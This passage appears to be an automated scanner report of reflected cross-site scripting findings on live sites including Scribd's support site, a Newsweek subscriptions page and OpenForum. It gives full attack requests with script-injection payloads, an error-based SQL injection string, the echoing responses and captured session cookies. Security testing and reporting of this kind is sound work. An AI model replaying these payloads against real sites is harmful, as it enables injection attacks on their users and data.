HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Thu, 06 Oct 2011 18:00:34 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404 Not Found
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-Runtime: 84
Set-Cookie: _zendesk_session=BAh7DCIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byJ3aHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS9hdHRhY2htZW50cy90b2tlbi91b3Zvbmd6M3YzajRyNW45YzE1MCI%2BPGE%2BZDcxZjM3Mzg5OWYvP25hbWU9cHJvZmlsZS1zaGVsZi1hbm5vdGF0ZWQucG5nOg9zZXNzaW9uX2lkIiUzNzM5N2Q1OWRlOTRkYjU1M2U4Y2U5MTMxMWNhN2UwNjoPdXBkYXRlZF9hdGwrB8LsjU46EF9jc3JmX3Rva2VuIjFoSFBpMVIvVCtzSGRLV3dLU20vN3BDUDdUdzV1YTBsenM0N2NBdzJQSTRVPToHaWQiFGt0cWxzcThkZ3V2YWhyNQ%3D%3D--dc70990a89dd905fe08a5f68bada61b19c4aa9ce; path=/; HttpOnly
Cache-Control: no-cache
Content-Length: 16327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http-e
...[SNIP]...
<link rel="canonical" href="support.scribd.com/attachments/token/uovongz3v3j4r5n9c150"><a>d71f373899f/?name=profile-shelf-annotated.png" />
...[SNIP]...

1.58. http://support.scribd.com/attachments/token/xp704tewqy91yw5/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://support.scribd.com
Path:   /attachments/token/xp704tewqy91yw5/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41bd2"><a>d67ca05e548 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /attachments/token/xp704tewqy91yw541bd2"><a>d67ca05e548/?name=rt-arrow.png HTTP/1.1
Host: support.scribd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://support.scribd.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: scribd_ubtc=u%3D7f9babb0-d272-012e-2bf7-002590024b52%26h%3DFfwiGviT19F8kzJrQxAitFSTrPepy%2FsXtQMVHZFYgxc%3D; scribd_rtc=qK44LfBrOJlkmgVWLmDe7vvAKJAcf25hXjFrr8W2Kx2CIv0p749Lsbwq94S%2BL%2BqnZ8IN5rikJITyXhemdWYWLESIjknufvynJXiwrSSpU79C0s199Y5%2Bv4fXCyljujrqJGvi%2BOKMXu8HOmFXHpwftcfa98Lo7zcgUoIEDcbYbDQSISK%2BYw5X6tVdf0HSz%2B8VtEeaaZBS%2Fybl%2FkvCOMm%2B4POZm2a1Uu98mCpYipV%2FOXFd7MP6XnM4J47D69UW71%2FgYJDAQgwfcw%2BT1M36xraztlqOvgfe9jjHMQwgqavg0aQtp4Q%2BCYeoEi1HCvs2ALiv-aZ9whwIVIiOvjuaOyZQmdV89r6E%3D; __qca=P0-1314780605-1317923807712; _scribd_session=BAh7BzoMY3NyZl9pZCIlMWQxN2JlYTA2ZWZhNDUxMzE1YWMwYTAyZTlkOWFkNWMiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--7f999eef9572e13045be744d4a1b7069da63199c; __utma=137936306.1317324286.1317923808.1317923808.1317923808.1; __utmb=137936306.15.7.1317923903488; __utmc=137936306; __utmz=137936306.1317923808.1.1.utmcsr=360i.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/mobile-marketing.html; __utmv=137936306.|1=logged_in=false=1; _zendesk_session=BAh7DjoQc291cmNlX3BhZ2UiCy9ob21lPyIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byIjaHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS9ob21lOg9zZXNzaW9uX2lkIiU1NDI1YTc2NTgwODdiMmFmOWFiZDdmYjlkZjU0YmQ2MDoPdXBkYXRlZF9hdGwrB1%2FsjU4iE3dhcmRlbi5tZXNzYWdlewA6EF9jc3JmX3Rva2VuIjEzQW1mRmx6VGdzQXBQQVpJYzRIZU5VTmJuQlk0UUhhZ3l6OFB6UkovU25jPToHaWQiFG0xZGxzZzM0ZndhMDNkdg%3D%3D--bdc4a3dabdb12e31cce91c198f04e3331e99c805

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Thu, 06 Oct 2011 18:00:12 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404 Not Found
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-Runtime: 76
Set-Cookie: _zendesk_session=BAh7DCIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byJoaHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS9hdHRhY2htZW50cy90b2tlbi94cDcwNHRld3F5OTF5dzU0MWJkMiI%2BPGE%2BZDY3Y2EwNWU1NDgvP25hbWU9cnQtYXJyb3cucG5nOg9zZXNzaW9uX2lkIiU5MWZhZDA3ZTliMGVjMzFlYmVjNWExNWRmYzQwYjViZjoPdXBkYXRlZF9hdGwrB6zsjU46EF9jc3JmX3Rva2VuIjFmdXduUk1IOE42Y045c1hKZHhyMUpqeW4vNDQraHQ0eXJUTXhwYXV5TGxzPToHaWQiFG1hamxzaWJuNW1vYmZ5OQ%3D%3D--440e228d2ebf6ba6717b16427fe1d04874629444; path=/; HttpOnly
Cache-Control: no-cache
Content-Length: 16311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http-e
...[SNIP]...
<link rel="canonical" href="support.scribd.com/attachments/token/xp704tewqy91yw541bd2"><a>d67ca05e548/?name=rt-arrow.png" />
...[SNIP]...

1.59. http://support.scribd.com/home [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://support.scribd.com
Path:   /home

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fc43"><script>alert(1)</script>af8f5c3b1da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home?8fc43"><script>alert(1)</script>af8f5c3b1da=1 HTTP/1.1
Host: support.scribd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.scribd.com/about
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: scribd_ubtc=u%3D7f9babb0-d272-012e-2bf7-002590024b52%26h%3DFfwiGviT19F8kzJrQxAitFSTrPepy%2FsXtQMVHZFYgxc%3D; scribd_rtc=qK44LfBrOJlkmgVWLmDe7vvAKJAcf25hXjFrr8W2Kx2CIv0p749Lsbwq94S%2BL%2BqnZ8IN5rikJITyXhemdWYWLESIjknufvynJXiwrSSpU79C0s199Y5%2Bv4fXCyljujrqJGvi%2BOKMXu8HOmFXHpwftcfa98Lo7zcgUoIEDcbYbDQSISK%2BYw5X6tVdf0HSz%2B8VtEeaaZBS%2Fybl%2FkvCOMm%2B4POZm2a1Uu98mCpYipV%2FOXFd7MP6XnM4J47D69UW71%2FgYJDAQgwfcw%2BT1M36xraztlqOvgfe9jjHMQwgqavg0aQtp4Q%2BCYeoEi1HCvs2ALiv-aZ9whwIVIiOvjuaOyZQmdV89r6E%3D; __qca=P0-1314780605-1317923807712; _scribd_session=BAh7BzoMY3NyZl9pZCIlMWQxN2JlYTA2ZWZhNDUxMzE1YWMwYTAyZTlkOWFkNWMiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--7f999eef9572e13045be744d4a1b7069da63199c; __utma=137936306.1317324286.1317923808.1317923808.1317923808.1; __utmb=137936306.15.7.1317923903488; __utmc=137936306; __utmz=137936306.1317923808.1.1.utmcsr=360i.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/mobile-marketing.html; __utmv=137936306.|1=logged_in=false=1; _zendesk_session=BAh7DCIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byIfaHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS86D3Nlc3Npb25faWQiJTU0MjVhNzY1ODA4N2IyYWY5YWJkN2ZiOWRmNTRiZDYwIhN3YXJkZW4ubWVzc2FnZXsAOg91cGRhdGVkX2F0bCsHX%2ByNTjoHaWQiFG0xZGxzZzM0ZndhMDNkdg%3D%3D--40b96d48cb646a5e5527c1b7cd9b3df11bb9551f

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Thu, 06 Oct 2011 17:59:05 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 200 OK
ETag: "52f2e233506357d94a1a07441943c7a6"
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-Runtime: 148
Set-Cookie: _zendesk_session=BAh7DjoQc291cmNlX3BhZ2UiOC9ob21lPzhmYzQzIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ%2BYWY4ZjVjM2IxZGE9MSIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byJRaHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS9ob21lPzhmYzQzIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ%2BYWY4ZjVjM2IxZGE9MToPc2Vzc2lvbl9pZCIlYzI4MzRlYmQ2Zjc0MjliNDRjZTZjOGZmY2FmNGMxYzc6EF9jc3JmX3Rva2VuIjEycXVYWEpzUkg1TzVmNUwvbUxqZEQ2R2VZd2NSbVN3c01wZW5zQmhFdFBvPSITd2FyZGVuLm1lc3NhZ2V7ADoPdXBkYXRlZF9hdGwrB2nsjU46B2lkIhQxMWZsc2t1d3lrcmdpMWg%3D--14b1670d728537de5e110416fcab7b43dbe271ab; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 17224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http-e
...[SNIP]...
<link rel="canonical" href="support.scribd.com/home?8fc43"><script>alert(1)</script>af8f5c3b1da=1" />
...[SNIP]...

1.60. http://support.scribd.com/widgets/async.json [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://support.scribd.com
Path:   /widgets/async.json

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba0c9"><script>alert(1)</script>d497db79da7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widgets/ba0c9"><script>alert(1)</script>d497db79da7?user_id=null&v=undefined&action_method=get&action_name=index&controller_name=home HTTP/1.1
Host: support.scribd.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://support.scribd.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: scribd_ubtc=u%3D7f9babb0-d272-012e-2bf7-002590024b52%26h%3DFfwiGviT19F8kzJrQxAitFSTrPepy%2FsXtQMVHZFYgxc%3D; scribd_rtc=qK44LfBrOJlkmgVWLmDe7vvAKJAcf25hXjFrr8W2Kx2CIv0p749Lsbwq94S%2BL%2BqnZ8IN5rikJITyXhemdWYWLESIjknufvynJXiwrSSpU79C0s199Y5%2Bv4fXCyljujrqJGvi%2BOKMXu8HOmFXHpwftcfa98Lo7zcgUoIEDcbYbDQSISK%2BYw5X6tVdf0HSz%2B8VtEeaaZBS%2Fybl%2FkvCOMm%2B4POZm2a1Uu98mCpYipV%2FOXFd7MP6XnM4J47D69UW71%2FgYJDAQgwfcw%2BT1M36xraztlqOvgfe9jjHMQwgqavg0aQtp4Q%2BCYeoEi1HCvs2ALiv-aZ9whwIVIiOvjuaOyZQmdV89r6E%3D; __qca=P0-1314780605-1317923807712; _scribd_session=BAh7BzoMY3NyZl9pZCIlMWQxN2JlYTA2ZWZhNDUxMzE1YWMwYTAyZTlkOWFkNWMiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--7f999eef9572e13045be744d4a1b7069da63199c; __utma=137936306.1317324286.1317923808.1317923808.1317923808.1; __utmb=137936306.15.7.1317923903488; __utmc=137936306; __utmz=137936306.1317923808.1.1.utmcsr=360i.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/mobile-marketing.html; __utmv=137936306.|1=logged_in=false=1; _zendesk_session=BAh7DjoQc291cmNlX3BhZ2UiCy9ob21lPyIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byIjaHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS9ob21lOg9zZXNzaW9uX2lkIiU1NDI1YTc2NTgwODdiMmFmOWFiZDdmYjlkZjU0YmQ2MDoPdXBkYXRlZF9hdGwrB1%2FsjU4iE3dhcmRlbi5tZXNzYWdlewA6EF9jc3JmX3Rva2VuIjEzQW1mRmx6VGdzQXBQQVpJYzRIZU5VTmJuQlk0UUhhZ3l6OFB6UkovU25jPToHaWQiFG0xZGxzZzM0ZndhMDNkdg%3D%3D--bdc4a3dabdb12e31cce91c198f04e3331e99c805

Response

HTTP/1.1 403 Forbidden
Server: nginx/0.8.53
Date: Thu, 06 Oct 2011 17:59:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 403 Forbidden
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-Runtime: 63
Set-Cookie: _zendesk_session=BAh7DSIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byIBn2h0dHA6Ly9zdXBwb3J0LnNjcmliZC5jb20vd2lkZ2V0cy9iYTBjOSI%2BPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PmQ0OTdkYjc5ZGE3P3VzZXJfaWQ9bnVsbCZ2PXVuZGVmaW5lZCZhY3Rpb25fbWV0aG9kPWdldCZhY3Rpb25fbmFtZT1pbmRleCZjb250cm9sbGVyX25hbWU9aG9tZToPc2Vzc2lvbl9pZCIlMTBlZTY4ZGZlYmE1NWMwYmI4MzA5YzcxMTMzOWQzNzc6EF9jc3JmX3Rva2VuIjFMQ0Y1V1IvY05lbzNWUUVsVzBQcm5yRDRYWEIyelR4SVk1SWFMTHFBU1ZvPToPdXBkYXRlZF9hdGwrB3HsjU4iE3dhcmRlbi5tZXNzYWdlewA6B2lkIhU3Z3Vsc2g0YjMtM3l2MWF1--7b408444b7c4f11483b8bbe954c83a9c7e01fcd9; path=/; HttpOnly
Cache-Control: no-cache
Content-Length: 16521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http-e
...[SNIP]...
<link rel="canonical" href="support.scribd.com/widgets/ba0c9"><script>alert(1)</script>d497db79da7?user_id=null&v=undefined&action_method=get&action_name=index&controller_name=home" />
...[SNIP]...

1.61. http://techaxcess.com/wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://techaxcess.com
Path:   /wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php

Issue detail

The value of the src request parameter is copied into the HTML document as plain text between tags. The payload 2794c<script>alert(1)</script>19636d8696c was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src=http://techaxcess.com/wp-content/uploads/2011/10/iStock_000017718366XSmall-150x150.jpg2794c<script>alert(1)</script>19636d8696c&h=40&w=40&zc=1 HTTP/1.1
Host: techaxcess.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://techaxcess.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
Date: Thu, 06 Oct 2011 20:51:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Content-Length: 121
Connection: close
Content-Type: text/html

file not found /wp-content/uploads/2011/10/iStock_000017718366XSmall-150x150.jpg2794c<script>alert(1)</script>19636d8696c

1.62. https://www.newsweeksubscriptions.com/FTcontrol/index.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b77b7<script>alert(1)</script>8da309aef67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /FTcontrol/b77b7<script>alert(1)</script>8da309aef67 HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php?submitted=V&kind=guard&t=&extra_info=&extra_info2=
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.newsweeksubscriptions.com
Content-Length: 784
Expect: 100-continue
Accept-Encoding: gzip, deflate

orderid=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(select+%40%40version)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:04:20 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 774
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/b77b7<script>alert(1)</script>8da309aef67 is not found !</p>
...[SNIP]...

1.63. https://www.newsweeksubscriptions.com/FTcontrol/index.php [orderid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of the orderid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1c99'%3balert(1)//c14d17d233c436490 was submitted in the orderid parameter. This input was echoed as b1c99';alert(1)//c14d17d233c436490 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FTcontrol/index.php?orderid=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(select+%40%40version)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))b1c99'%3balert(1)//c14d17d233c436490&studentplace=3&studentcourse=3&studentyear=3&title=3&name=Smith&fname=Smith&lname=Smith&initials=3&company=3&city=3&address=3&address2=3&address3=3&state=3&zipcode=3&email=netsparker%40example.com&telephone=3&gender=3&debug=3&count=3&cc_type=3&cc_number=3&cc_holder=3&cc_month=3&cc_year=3&cc_scode=3&country=3&newstatus=3&interextra=3&extra_info=3&extra_info2=3&sub_type=3&isgift=3&SourceCode=3&KeyCode=3&Code=3&reference_url=3&semail=netsparker%40example.com&campaign_type=3&tagsrc=3&rnd=3&absplitsrc=3&abrnd=3&paym=3&offer=3&kind=lp&submitted=V HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php?submitted=V&kind=guard&t=&extra_info=&extra_info2=
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 19:58:32 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 182
Content-Type: text/html; charset=UTF-8


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'b1c99';alert(1)//c14d17d233c436490' at line 1

1.64. https://www.openforum.com/ [cid%3dinav_home%26inav%3dmenu_business_openforum&SSOCK parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The value of the cid%3dinav_home%26inav%3dmenu_business_openforum&SSOCK request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a558'-alert(1)-'86896b00bf2 was submitted in the cid%3dinav_home%26inav%3dmenu_business_openforum&SSOCK parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /?cid%3dinav_home%26inav%3dmenu_business_openforum&SSOCK=19a558'-alert(1)-'86896b00bf2 HTTP/1.1
Host: www.openforum.com
Connection: keep-alive
Content-Length: 0
Cache-Control: max-age=0
Origin: https://online.americanexpress.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://online.americanexpress.com/myca/tpintg/us/action?request_type=un_nucleusLogonDetect&Face=en_US&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3fcid%253dinav_home%2526inav%253dmenu_business_openforum%26SSOCK%3d1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerAmex=2701895872.20480.0000

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 153781
SSL: True
Expires: Thu, 06 Oct 2011 21:07:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 06 Oct 2011 21:07:39 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: NucleusAuth=; path=/
Set-Cookie: NucleusAuth_Prospect=; path=/
Set-Cookie: LIVisitorGuid=; path=/
Set-Cookie: SessionKey=; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!--[if IE 7 ]><html class="ie7" xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...
tion?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3fcid%25253dinav_home%252526inav%25253dmenu_business_openforum%2526SSOCK%253d19a558'-alert(1)-'86896b00bf2';
       AX.logout_dest_url = 'https://www.openforum.com/?cid%253dinav_home%2526inav%253dmenu_business_openforum%26SSOCK%3d19a558'-alert(1)-'86896b00bf2';
   /*]]>
...[SNIP]...

1.65. https://www.openforum.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bff6b"><script>alert(1)</script>ba1cf7adb44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /?cid%3dinav_home%26inav%3dmenu_business_openforum&SSOCK=1&bff6b"><script>alert(1)</script>ba1cf7adb44=1 HTTP/1.1
Host: www.openforum.com
Connection: keep-alive
Content-Length: 0
Cache-Control: max-age=0
Origin: https://online.americanexpress.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://online.americanexpress.com/myca/tpintg/us/action?request_type=un_nucleusLogonDetect&Face=en_US&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3fcid%253dinav_home%2526inav%253dmenu_business_openforum%26SSOCK%3d1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerAmex=2701895872.20480.0000

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 155575
SSL: True
Expires: Thu, 06 Oct 2011 21:07:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 06 Oct 2011 21:07:42 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: SSOCK=10/6/2011 5:07:42 PM; path=/
Set-Cookie: NucleusAuth=; path=/
Set-Cookie: NucleusAuth_Prospect=; path=/
Set-Cookie: LIVisitorGuid=; path=/
Set-Cookie: SessionKey=; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!--[if IE 7 ]><html class="ie7" xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...
<link rel="canonical" href="http://www.openforum.com/?cid%3dinav_home%26inav%3dmenu_business_openforum&SSOCK=1&bff6b"><script>alert(1)</script>ba1cf7adb44=1" />
...[SNIP]...

1.66. https://www.openforum.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 410e5'-alert(1)-'714c9e3ae1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

